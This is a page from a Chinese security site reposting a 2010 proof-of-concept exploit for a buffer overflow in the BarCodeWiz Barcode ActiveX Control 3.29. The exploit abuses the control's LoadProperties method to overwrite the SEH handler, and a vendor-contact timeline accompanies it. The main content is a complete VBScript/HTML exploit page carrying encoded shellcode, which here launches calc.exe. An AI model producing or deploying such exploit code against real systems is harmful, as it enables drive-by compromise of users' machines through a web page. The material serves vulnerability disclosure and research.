首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
BarCodeWiz Barcode ActiveX Control 3.29 BoF Exploit (SEH)
来源:vfocus.net 作者:loneferret 发布时间:2010-07-31  

# BarCodeWiz Barcode ActiveX Control 3.29 BoF (SEH)
# Bug found: 24th July 2010
# Author: loneferret
# Software: http://www.barcodewiz.com/
# Nods to exploit-db.com

# Vulnerable file BarCodeWiz.dll
# LoadProperties method

# Tested on: Windows XP Professional SP3 with Internet Explorer 6
# [Needs adjustment for Internet Explorer 7]

 
# Vendor contacted: 24th July 2010
# Vendor first reply: 26th July 2010: Wanting more information
# Vendor contacted: 26th July 2010: Sent 2 proof of concepts files
# Vendor contacted: 29 July 2010: Asked for update
# No Response from vendor: 30 July 2010
# Public Release : 30 July 2010

#
# Shellcode calc.exe
#

----HTML FILE FROM HERE ON-----

<html>
<object classid='clsid:CD3B09F1-26FB-41CD-B3F2-E178DFD3BCC6' id='target'></object>
<script language='vbscript'>

buffer = String(97,"A")
jmp = unescape("%eb%06%41%41")
SEH = unescape("%4b%f4%02%10")
shellcode=unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36")
shellcode=shellcode+unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41")
shellcode=shellcode+unescape("%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4a%4e%46%34%42%30%42%30%42%50%4b%48%45%34%4e%53%4b%48%4e%47")
shellcode=shellcode+unescape("%45%30%4a%57%41%30%4f%4e%4b%58%4f%34%4a%31%4b%58%4f%35%42%42%41%30%4b%4e%49%54%4b%38%46%33%4b%38")
shellcode=shellcode+unescape("%41%30%50%4e%41%43%42%4c%49%49%4e%4a%46%38%42%4c%46%37%47%30%41%4c%4c%4c%4d%30%41%50%44%4c%4b%4e")
shellcode=shellcode+unescape("%46%4f%4b%43%46%35%46%42%46%50%45%47%45%4e%4b%58%4f%45%46%32%41%50%4b%4e%48%36%4b%38%4e%50%4b%54")
shellcode=shellcode+unescape("%4b%38%4f%35%4e%31%41%30%4b%4e%4b%58%4e%31%4b%38%41%30%4b%4e%49%38%4e%35%46%52%46%50%43%4c%41%33")
shellcode=shellcode+unescape("%42%4c%46%36%4b%48%42%44%42%53%45%58%42%4c%4a%37%4e%50%4b%38%42%44%4e%50%4b%48%42%47%4e%41%4d%4a")
shellcode=shellcode+unescape("%4b%48%4a%36%4a%30%4b%4e%49%30%4b%48%42%38%42%4b%42%50%42%50%42%50%4b%38%4a%46%4e%43%4f%35%41%43")
shellcode=shellcode+unescape("%48%4f%42%46%48%45%49%48%4a%4f%43%48%42%4c%4b%57%42%55%4a%56%42%4f%4c%38%46%50%4f%45%4a%36%4a%49")
shellcode=shellcode+unescape("%50%4f%4c%48%50%50%47%55%4f%4f%47%4e%43%36%41%56%4e%56%43%56%42%30%5a")
buffer2 = String(1552, "C")

arg1 = buffer + jmp + SEH + shellcode + buffer2

target.LoadProperties arg1

</script>

Barcodewiz 3.29
</html>
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·BarCodeWiz BarCode ActiveX 3.2
·ChordPulse 1.4 Denial of Servi
·HTML Email Creator 2.42 build
·MAYASAN PORTAL V 1.0 / V 2.0 D
·WM Downloader 3.1.2.2 2010.04.
·Zemana AntiLogger AntiLog32.sy
·SigPlus Pro v3.74 ActiveX LCDW
·Xmyplay 3.5.1 Denial of Servic
·UPlusFTP Server v1.7.1.01 [ HT
·Xion Audio Player 1.0.125 Deni
·Symantec AMS Intel Alert Handl
·Barcodewiz v3.29 Barcode Activ
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved